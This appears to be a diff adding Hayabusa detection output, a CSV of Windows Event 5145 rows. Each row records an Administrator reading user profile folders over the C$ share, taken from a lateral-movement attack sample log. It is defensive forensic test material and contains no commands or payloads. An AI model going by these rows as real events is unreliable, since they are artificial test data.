+2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
